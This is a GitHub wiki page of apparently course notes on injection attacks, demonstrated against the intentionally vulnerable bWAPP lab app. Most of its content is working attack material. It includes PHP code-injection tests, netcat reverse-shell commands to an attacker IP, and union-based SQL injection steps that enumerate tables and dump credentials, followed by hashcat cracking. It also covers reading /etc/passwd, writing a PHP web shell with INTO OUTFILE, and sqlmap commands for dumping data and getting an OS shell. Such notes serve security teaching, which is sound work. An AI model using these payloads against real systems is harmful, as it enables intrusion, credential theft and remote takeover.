App Vulnerabilities: Injection Attacks - Paiet/SEC-335 GitHub Wiki
- Injections
- Command
- Code
- Leverages coding language
- DEMO: PHP Code Injection on BWAPP
- Test with
phpinfo()system("whomai")nc -nv attackerIP port -e /bin/bash
- Test with
- DEMO: PHP Code Injection on BWAPP
- Leverages coding language
App Vulnerabilities: SQL Injection Attacks
- SQL
- Login/Auth Bypass
- Error-based
- Testing for injection
- The single-quote (
') is your friend
- The single-quote (
- ORDER BY
iron' order by 1 --- Increase the number by 1 until you receive an error
- Now you know how many columns
- Increase the number by 1 until you receive an error
- UNION ALL SELECT
iron' union all select 1,2,3,4,5,6,7 --- You can now see where usable areas are
- They will be selected for output fields
iron' union all select 1,user(),3,4,@@version,6,7 --
- They will be selected for output fields
- You can now see where usable areas are
- TABLE enum
...1,table_name,3,4,5,6,7 FROM information_schema.tables --
- COLUMN enum
...1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_name='users' --
- Read COLUMN info
...1,login,3,4,password,6,7 FROM users --- Save creds to file
- Check hash type with hash-identifier and crack with hashcat
hashcat -m 100 -a 0 nixPass.txt /usr/share/wordlists/rockou.txt --force
- Testing for injection
App Vulnerabilities: Injection Attacks Pt.2
-
Blind
- Boolean
- Try passing a TRUE statement (
' or 1=1 --)- If the command executes correctly then you know you're injecting SQL
- Try passing a FALSE statement (
' or 1=2 --)
- Try passing a TRUE statement (
- Time-based
- Try using the sleep function
'-sleep(1) --- If site hangs, SQLi is possible
- Try using the sleep function
- Boolean
-
READ/WRITE/CODE_EXEC
- READ from file
union all select 1,load_file("/etc/passwd"),3,4,5,6,7 --- View source for better formatting of output
- WRITE to file
union all select 1,"Test",3,4,5,6,7 into OUTFILE '/var/www/test.txt'- You may get permission denied
- Try to find another directory with write perms
dirb http://10.0.0.175/bWAPP/ /usr/share/wordlists/dirb/big.txt- Trial and error through the any listed directories
- Found writable dir: /var/www/bWAPP/documents
- CODE EXEC may now be possible :)
- Found writable dir: /var/www/bWAPP/documents
- Trial and error through the any listed directories
- Try to find another directory with write perms
- You may get permission denied
- CODE EXEC
-
union all select 1,"<?php echo shell_exec($_GET['cmd'];?>)",3,4,5,6,7 into OUTFILE '/var/www/bWAPP/documents/revshell.php'- Start a listener on port 4444
- Now browse to your backdoor and execute a command
-
http://10.0.0.175/bWAPP/documents/revshell.php?cmd= nc -nv 10.0.0.169 4444 -e /bin/bash
-
-
- READ from file
-
SQLMap
- Scan DB using POSTsqlmap --cookie="security_level=0; PHPSESSID=2ecf6671bdeb964ae7675639a0e7801a" --data "title=Iron+Man&action=search" -u "http://10.0.0.175/bWAPP/sqli_6.php" -D bWAPP --dump
- Get OS Shellsqlmap --cookie="security_level=0; PHPSESSID=2ecf6671bdeb964ae7675639a0e7801a" --data "title=Iron+Man&action=search" -u "http://10.0.0.175/bWAPP/sqli_6.php" -D bWAPP --os-shell